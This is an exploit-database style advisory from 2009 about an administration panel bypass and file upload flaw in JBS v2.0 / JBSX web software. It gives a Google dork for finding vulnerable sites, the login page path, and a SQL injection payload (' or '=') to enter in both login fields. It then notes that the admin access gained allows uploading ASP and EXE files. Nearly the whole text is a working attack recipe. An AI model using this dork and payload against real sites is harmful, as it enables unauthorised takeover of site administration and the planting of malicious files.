[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability
# Published : 2009-11-17
# Author : blackenedsecurity
# Previous Title : Joomla Ext. iF Portfolio Nexus SQL injection
# Next Title : TelebidAuctionScript(aid) Blind SQL Injection Vulnerability


# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"


Go to url files/login.asp

admin 'or' '='    
password 'or' '='

H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.


# Bug discovered by blackenedsecurity
# http://blackenedsecurity.blogcu.com
# msn: syberhunter@hotmail.com
# From Turkey =)